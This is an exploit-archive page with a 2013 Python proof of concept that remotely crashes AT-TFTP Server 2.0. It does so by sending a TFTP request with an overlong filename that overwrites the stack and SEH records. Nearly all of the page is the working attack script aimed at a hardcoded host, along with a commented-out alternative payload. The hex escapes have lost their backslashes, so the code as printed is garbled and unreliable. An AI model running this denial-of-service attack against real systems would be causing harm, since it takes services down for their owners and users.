AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS
# Published : 2013-04-12
# Author :
# Previous Title : ircd-hybrid 8.0.5 - Denial of Service
# Next Title : Sysax Multi Server 6.10 - SSH Denial of Service

# Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS 
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions 
# Vendor Homepage:  http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1 
# Version: 2.0 
# Tested on: Windows XP SP3
#
# From 1.9 Remote Exec BOF disovered in 2006 by liuqx@nipc.org.cn  to 2.0 Remote DOS BOF 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite but no exception handler trigger (cookie on stack?)
# 2. Read access violation (non-exploitable?)
#
# Still we can crash the server remotely.  
#
#!/usr/bin/python
import socket
import sys
host = '192.168.1.32'
port = 69

nseh="xCCxCCxCCxCC"

#seh handler overwritten at 261 byte of shellcode but to exception triggered to use it.
 
seh="x18x0Bx27" # Breakpoint in no SafeSEH space in Windows XP SP3


payload="xCC"*257 + nseh + seh + "x00" + "3137" + "x00"

#payload to get access violation:
#payload=("x00x01x25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x35"
#"x63x65x74x63x25x32x35x35x63x68x6fx73x74x73x00x6e"
#"x00")

buffer="x00x01"+  payload + "x06" + "netascii" + "x00"


s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(buffer, (host, port))